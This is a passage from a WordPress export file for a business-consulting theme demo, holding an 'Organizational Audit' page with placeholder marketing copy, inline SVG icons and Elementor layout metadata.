}}}s:5:"ictf7";a:3:{s:5:"count";i:1;s:15:"control_percent";i:2;s:8:"controls";a:3:{s:7:"content";a:1:{s:15:"section_content";a:1:{s:3:"cf7";i:1;}}s:8:"advanced";a:2:{s:19:"_section_background";a:1:{s:22:"_background_background";i:1;}s:15:"_section_border";a:2:{s:14:"_border_radius";i:1;s:21:"_border_radius_tablet";i:1;}}s:5:"style";a:1:{s:13:"section_style";a:1:{s:12:"css_responce";i:1;}}}}}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[select_footer]]></wp:meta_key>
		<wp:meta_value><![CDATA[1506]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Organizational Audit</title>
		<link>http://wpdemo.archiwp.com/maxbizz/our-services/organizational-audit/</link>
		<pubDate>Thu, 17 Sep 2020 04:03:11 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=959</guid>
		<description></description>
		<content:encoded><![CDATA[<h6>how we help</h6>		
			<h1>Align Costs with Strategy & Focus on Growth</h1>		
			<a href="#">get in touch</a>
	        main principles	        <h3>Global Reach with Local  Understanding</h3>	    
				In what areas do you provide management consulting? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.</p>				
				In which countries do you provide consulting services? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.</p>				
				How is a consulting project started and organized? 
					<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.</p>				
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
	        our benefits	        <h3>Why Clients Choose Us</h3>	    
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M436.275,39.807H304.797C300.155,17.119,280.039,0,256,0s-44.156,17.119-48.798,39.807H75.725    c-14.771,0-26.789,12.018-26.789,26.789V351.16c0,14.771,12.017,26.789,26.789,26.789H200.63l-40.566,120.866    c-1.757,5.235,1.063,10.904,6.299,12.662c1.055,0.354,2.128,0.522,3.183,0.522c4.179,0,8.076-2.641,9.479-6.821l42.702-127.229    h68.546l42.702,127.229c1.403,4.181,5.3,6.821,9.479,6.821c1.055,0,2.128-0.169,3.183-0.522c5.236-1.758,8.056-7.427,6.299-12.662    l-40.566-120.866h124.905c14.771,0,26.789-12.018,26.789-26.789V66.596C463.063,51.824,451.046,39.807,436.275,39.807z M256,20    c12.93,0,23.963,8.274,28.082,19.807h-56.163C232.038,28.274,243.071,20,256,20z M443.063,351.16c0,3.743-3.045,6.789-6.789,6.789    h-26.121v-142.56c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10V357.95H359.39V245.979c0-5.522-4.477-10-10-10    c-5.523,0-10,4.478-10,10v111.97h-28.084v-79.255c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v79.255h-25.308V253.277    c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v104.672h-29.037v-55.023c0-5.522-4.477-10-10-10c-5.523,0-10,4.478-10,10v55.023    h-23.221v-50.985c0-5.522-4.477-10-10-10s-10,4.478-10,10v50.985h-26.777v-39.337c0-5.522-4.477-10-10-10s-10,4.478-10,10v39.337    h-31.24c-3.743,0-6.789-3.046-6.789-6.789V66.596c0-3.743,3.045-6.789,6.789-6.789h140.468h79.614h140.468    c3.743,0,6.789,3.046,6.789,6.789V351.16z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M410.105,106.884c-0.013-0.137-0.039-0.269-0.058-0.404c-0.026-0.188-0.049-0.377-0.086-0.564    c-0.031-0.158-0.075-0.312-0.114-0.467c-0.04-0.161-0.076-0.323-0.124-0.482c-0.046-0.153-0.104-0.301-0.158-0.451    c-0.056-0.158-0.109-0.317-0.173-0.473c-0.058-0.139-0.125-0.272-0.189-0.407c-0.075-0.161-0.147-0.323-0.231-0.48    c-0.068-0.127-0.146-0.249-0.22-0.373c-0.093-0.156-0.181-0.314-0.283-0.466c-0.089-0.134-0.19-0.259-0.285-0.388    c-0.098-0.133-0.191-0.268-0.297-0.397c-0.179-0.218-0.37-0.425-0.567-0.627c-0.033-0.033-0.06-0.07-0.093-0.103    c-0.032-0.032-0.068-0.059-0.1-0.09c-0.203-0.198-0.412-0.39-0.631-0.57c-0.122-0.1-0.25-0.188-0.376-0.281    c-0.136-0.102-0.269-0.207-0.41-0.302c-0.144-0.096-0.293-0.179-0.44-0.267c-0.133-0.08-0.264-0.163-0.401-0.237    c-0.146-0.078-0.296-0.144-0.445-0.214c-0.147-0.07-0.292-0.143-0.444-0.206c-0.141-0.058-0.285-0.105-0.427-0.156    c-0.166-0.06-0.329-0.123-0.499-0.174c-0.139-0.042-0.279-0.072-0.419-0.108c-0.176-0.045-0.35-0.094-0.53-0.129    c-0.156-0.031-0.314-0.049-0.471-0.072c-0.166-0.025-0.329-0.055-0.497-0.072c-0.267-0.026-0.535-0.036-0.804-0.041    c-0.06-0.001-0.118-0.009-0.178-0.009h-43.197c-5.523,0-10,4.478-10,10s4.477,10,10,10h19.054l-83.028,83.028l-21.797-21.798    c-1.875-1.875-4.419-2.929-7.071-2.929s-5.196,1.054-7.071,2.929l-72.161,72.162l-21.543-21.543    c-3.905-3.904-10.237-3.904-14.142,0l-36.492,36.492c-3.905,3.905-3.905,10.237,0,14.143c1.953,1.952,4.512,2.929,7.071,2.929    c2.559,0,5.119-0.977,7.071-2.929l29.42-29.421l21.543,21.542c3.905,3.904,10.237,3.904,14.142,0l72.161-72.161l21.797,21.798    c1.875,1.875,4.419,2.929,7.071,2.929s5.196-1.054,7.071-2.929l90.099-90.099v19.054c0,5.522,4.477,10,10,10    c5.523,0,10-4.478,10-10v-43.191C410.155,107.546,410.138,107.214,410.105,106.884z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="107.869" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="148.639" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="119.779" cy="189.409" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Consulting</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M473.492,189.736h-0.001l-22.417-2.651c-2.44-6.903-5.255-13.693-8.412-20.293l13.979-17.731    c13.686-17.358,13.649-40.806-0.084-54.541l-39.083-39.083c-13.734-13.734-37.182-13.771-54.543-0.083l-17.73,13.981    c-6.603-3.159-13.393-5.974-20.294-8.412l-2.651-22.417C319.659,16.554,303.054,0,283.63,0h-55.271    c-19.424,0-36.03,16.555-38.626,38.51l-2.65,22.417c-6.899,2.439-13.684,5.251-20.284,8.408l-17.73-13.981    c-17.359-13.687-40.807-13.653-54.543,0.083L55.444,94.519c-13.734,13.735-13.771,37.183-0.084,54.541l13.979,17.73    c-3.159,6.602-5.974,13.392-8.413,20.293l-22.418,2.651C16.555,192.33,0,208.935,0,228.359v55.271    c0,19.423,16.554,36.029,38.506,38.624l22.417,2.652c2.438,6.902,5.253,13.692,8.411,20.294l-13.981,17.731    c-13.688,17.359-13.652,40.807,0.083,54.542l39.082,39.083c13.733,13.733,37.182,13.771,54.541,0.084l17.73-13.979    c6.603,3.159,13.393,5.974,20.294,8.413l2.65,22.417C192.329,495.445,208.934,512,228.359,512h55.271    c19.424,0,36.029-16.554,38.626-38.507l2.651-22.416c6.906-2.44,13.698-5.255,20.304-8.416l17.73,13.98    c17.359,13.684,40.807,13.65,54.541-0.085l39.082-39.082c13.734-13.734,13.771-37.182,0.083-54.542l-13.981-17.731    c3.158-6.602,5.973-13.392,8.411-20.294l22.416-2.652C495.445,319.658,512,303.053,512,283.63v-55.271    C512,208.935,495.445,192.33,473.492,189.736z M492,283.63c0,9.291-8.966,17.357-20.854,18.763l-28.704,3.396    c-3.897,0.461-7.165,3.16-8.354,6.9c-3.183,10.008-7.246,19.808-12.073,29.128c-1.807,3.487-1.406,7.709,1.026,10.792    l17.904,22.706c7.413,9.403,8.049,21.448,1.479,28.017l-39.082,39.083c-6.57,6.569-18.614,5.934-28.016-1.479l-22.706-17.903    c-3.083-2.431-7.303-2.833-10.792-1.026c-9.325,4.831-19.128,8.895-29.136,12.078c-3.74,1.189-6.439,4.457-6.9,8.355    l-3.396,28.705c-1.407,11.89-9.474,20.856-18.765,20.856H228.36c-9.292,0-17.359-8.967-18.765-20.857l-3.394-28.706    c-0.461-3.897-3.159-7.166-6.899-8.355c-10.006-3.183-19.806-7.246-29.129-12.076c-1.451-0.752-3.029-1.121-4.598-1.121    c-2.204,0-4.392,0.727-6.193,2.149l-22.706,17.902c-9.403,7.414-21.448,8.047-28.016,1.479l-39.082-39.083    c-6.571-6.57-5.935-18.614,1.479-28.016l17.904-22.707c2.431-3.084,2.833-7.306,1.026-10.792    c-4.827-9.319-8.889-19.12-12.073-29.128c-1.189-3.74-4.457-6.439-8.354-6.9l-28.705-3.396C28.966,300.987,20,292.921,20,283.63    v-55.271c0-9.291,8.967-17.358,20.857-18.764l28.706-3.394c3.898-0.461,7.166-3.159,8.355-6.899    c3.183-10.006,7.246-19.807,12.075-29.129c1.807-3.486,1.406-7.708-1.026-10.791l-17.902-22.706    c-7.414-9.402-8.049-21.446-1.479-28.016l39.081-39.083c6.569-6.57,18.615-5.935,28.017,1.48l22.706,17.904    c3.083,2.431,7.304,2.834,10.791,1.027c9.318-4.827,19.115-8.888,29.12-12.071c3.74-1.189,6.438-4.457,6.899-8.355l3.394-28.705    C211.001,28.967,219.067,20,228.359,20h55.271c9.291,0,17.358,8.966,18.764,20.855l3.396,28.705c0.461,3.898,3.16,7.166,6.9,8.355    c10.005,3.181,19.806,7.244,29.128,12.073c3.484,1.807,7.708,1.406,10.792-1.026l22.706-17.904    c9.404-7.412,21.448-8.051,28.017-1.48l39.083,39.082c6.569,6.57,5.933,18.614-1.479,28.016l-17.903,22.707    c-2.431,3.084-2.833,7.305-1.026,10.792c4.827,9.315,8.889,19.115,12.075,29.127c1.189,3.74,4.457,6.439,8.355,6.899l28.706,3.394    h-0.001c11.89,1.406,20.857,9.473,20.857,18.764V283.63z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M255.999,94.28c-89.173,0-161.721,72.548-161.721,161.721c0,35.631,11.362,69.426,32.86,97.729    c20.797,27.382,50.325,47.78,83.142,57.435c5.301,1.56,10.856-1.473,12.416-6.771c1.559-5.298-1.472-10.857-6.771-12.416    C156.078,374.37,114.279,318.454,114.279,256c0-78.145,63.575-141.721,141.721-141.721S397.721,177.855,397.721,256    c0,64.606-43.619,121.026-106.076,137.203c-5.346,1.385-8.558,6.842-7.173,12.188c1.167,4.506,5.226,7.495,9.674,7.495    c0.831,0,1.674-0.104,2.515-0.322C367.94,394.102,417.721,329.72,417.721,256C417.721,166.827,345.172,94.28,255.999,94.28z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M334.324,302.94L266,251.038v-44.663c0-5.523-4.478-10-10-10c-5.522,0-10,4.477-10,10V256    c0,3.126,1.462,6.072,3.952,7.962l72.275,54.903c1.809,1.374,3.933,2.038,6.041,2.038c3.019,0,6.003-1.361,7.97-3.951    C339.579,312.554,338.722,306.281,334.324,302.94z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="256" cy="164.02" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="252.36" cy="407.72" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Planning</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
	<g>
		<circle cx="419.22" cy="133.64" r="10"></circle>
	</g>
</g>
</svg>	        
				<h5><a href="#">Strategy</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
		    	<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve">
<g>
	<g>
		<circle cx="87.43" cy="406.69" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<circle cx="470.4" cy="287.44" r="10"></circle>
	</g>
</g>
<g>
	<g>
		<path d="M354.647,212.344h-5.797h-3.761h-5.797c-4.854,0-8.802-3.948-8.802-8.802v-8.931c0.001-4.854,3.949-8.802,8.802-8.802    h17.012c3.939,0,7.145,3.204,7.145,7.144c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10c0-14.743-11.818-26.771-26.479-27.127    v-8.584c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10v8.669c-14.798,1.188-26.479,13.602-26.479,28.7v8.931    c0,15.881,12.921,28.802,28.802,28.802h5.797h3.761h5.797c4.854,0,8.802,3.948,8.802,8.801v8.932c0,4.853-3.948,8.801-8.802,8.801    h-17.012c-3.939,0-7.145-3.204-7.145-7.144c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10c0,14.744,11.819,26.771,26.479,27.127    v8.584c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-8.669c14.798-1.188,26.479-13.601,26.479-28.699v-8.932    C383.449,225.264,370.528,212.344,354.647,212.344z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M499.899,339.009c-4.115-9.319-11.613-16.479-21.112-20.159c-9.499-3.68-19.864-3.442-29.183,0.675    c-0.05,0.021-0.1,0.044-0.148,0.066l-62.989,29.048c-5.016,2.313-7.206,8.254-4.894,13.269c2.313,5.016,8.255,7.205,13.269,4.894    l62.908-29.011c4.415-1.927,9.317-2.03,13.813-0.291c4.518,1.751,8.083,5.155,10.04,9.588c1.958,4.433,2.071,9.361,0.321,13.879    c-1.751,4.519-5.155,8.084-9.588,10.041l-128.9,56.914c-20.326,8.975-43.397,8.453-63.301-1.435l-47.185-23.441    c-25.238-12.539-54.498-13.204-80.277-1.819l-0.6,0.264l-34.973-79.21l48.628-21.47c23.239-10.261,49.169-11.087,73.012-2.332    l94.885,34.845c8.475,3.112,12.992,12.594,10.069,21.135c-2.978,8.704-12.491,13.387-21.205,10.44l-73.375-24.818    c-5.233-1.77-10.907,1.037-12.677,6.269c-1.77,5.232,1.037,10.907,6.269,12.677l73.375,24.818    c3.88,1.313,7.831,1.936,11.721,1.936c15.283,0,29.606-9.62,34.816-24.848c6.413-18.746-3.501-39.553-22.099-46.382    l-94.885-34.845c-6.382-2.344-12.888-4.115-19.454-5.321v-55.277c0-54.504,44.343-98.847,98.847-98.847h36.524    c54.505,0,98.848,44.343,98.848,98.847v26.061c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-26.061    c0-57.721-41.365-105.956-96.008-116.636V72.349l25.267-43.222c1.429-2.443,1.755-5.378,0.897-8.075    c-0.858-2.697-2.817-4.905-5.394-6.076l-30.99-14.08c-2.373-1.078-5.072-1.187-7.523-0.305l-22.995,8.276l-20.396-8.153    c-2.345-0.936-4.956-0.951-7.312-0.044l-32.428,12.511c-2.698,1.041-4.813,3.2-5.801,5.919c-0.986,2.719-0.748,5.731,0.655,8.261    l24.881,44.867v30.038c-55.169,10.258-97.072,58.744-97.072,116.84v53.36c-16.52-0.156-33.022,3.199-48.53,10.046l-48.99,21.63    c-2.806-4.199-6.808-7.445-11.615-9.307c-6.172-2.392-12.907-2.236-18.938,0.427l-63.29,27.733    c-3.637,1.594-5.986,5.188-5.986,9.159V502c0,3.473,1.802,6.697,4.76,8.518c1.603,0.985,3.419,1.482,5.24,1.482    c1.542,0,3.088-0.356,4.509-1.074l122.873-62.071c5.926-2.698,10.477-7.518,12.833-13.6c1.925-4.969,2.199-10.302,0.839-15.352    l0.865-0.382c20.327-8.977,43.401-8.454,63.301,1.435l47.185,23.442c25.239,12.536,54.498,13.199,80.277,1.818l128.9-56.914    c9.319-4.114,16.479-11.612,20.159-21.111C504.252,358.692,504.013,348.328,499.899,339.009z M364.391,100.259h-2.84h-36.524    h-1.775V79.641h41.139V100.259z M301.431,27.704l18.049-6.961l20.275,8.105c2.272,0.908,4.798,0.953,7.099,0.123l22.744-8.187    l17.201,7.815l-18.146,31.04h-49.512L301.431,27.704z M137.868,430.678c-0.158,0.07-0.315,0.145-0.47,0.223L28.831,485.745    v-40.524l28.113-13.805c4.958-2.435,7.003-8.427,4.569-13.384c-2.435-4.958-8.425-7.005-13.384-4.569l-19.299,9.476V338.69    l57.329-25.122c1.575-0.694,2.97-0.352,3.661-0.084c0.689,0.268,1.951,0.951,2.647,2.528l2.292,5.19    c0.001,0.002,0.001,0.004,0.002,0.006c0.001,0.002,0.002,0.004,0.003,0.006l45.546,103.154    C141.377,426.782,140.282,429.612,137.868,430.678z"></path>
	</g>
</g>
</svg>	        
				<h5><a href="#">Support</a></h5>				<p>We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled </p>			
        			<a href="#"class="link-details"> Explore More </a>
			<h2>Looking for a First-Class Finance Firm?</h2>		
		<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.</p>		
			<a href="http://wpdemo.archiwp.com/maxbizz/contact-us">get in touch</a>
	        reliable & safe	        <h3>Our Strategy Development</h3>	    
						<ul>
								<li data-tab="tab-1843">Research</li>
								<li data-tab="tab-2843">aproach</li>
								<li data-tab="tab-3843">result</li>
							</ul>
				<p>We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.</p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.</p>			
				<p>We can definitely define the provided level and range of Synergy Development Consulting as a full-cycle support. Therefore, we treat each client as an equal partner in the long term. Our team consists of talented and motivated people who are united by love to their work!</p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.</p>			
				<p>Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.</p><p>Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.</p>			
			<a href="#">Explore More </a>
										<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px" />]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>959</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 04:03:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 04:03:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[organizational-audit]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[869]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"41c2f83","elType":"section","settings":{"padding":{"unit":"px","top":"90","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"99e32eb","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"bbf118c","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-service-detail2.jpg","id":961},"background_position":"center center","background_position_mobile":"center left","background_repeat":"no-repeat","background_size":"cover","background_size_tablet":"cover","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"100","isLinked":false},"padding_tablet":{"unit":"px","top":"110","right":"0","bottom":"110","left":"60","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"30","isLinked":false}},"elements":[{"id":"5e47caf","elType":"column","settings":{"_column_size":50,"_inline_size":44.63600000000000278532752417959272861480712890625,"_inline_size_tablet":70,"_inline_size_mobile":100},"elements":[{"id":"4376d3b","elType":"widget","settings":{"title":"how we help","header_size":"h6","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"bold","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1e1f3f6","elType":"widget","settings":{"title":"Align Costs with Strategy & Focus on Growth","header_size":"h1","title_color":"#FFFFFF","typography_typography":"custom","typography_font_family":"Inter","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bb56b1a","elType":"widget","settings":{"btn_style":"dark","text":"get in touch"},"elements":[],"widgetType":"ibutton"}],"isInner":true},{"id":"a57cea8","elType":"column","settings":{"_column_size":50,"_inline_size":55.36399999999999721467247582040727138519287109375,"_inline_size_tablet":30,"_inline_size_mobile":100},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"c25f6a6","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"95","right":"0","bottom":"130","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"95","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"2385c34","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"b25f0cc","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"cf25bf5","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"cab9896"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"d505a0a"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, 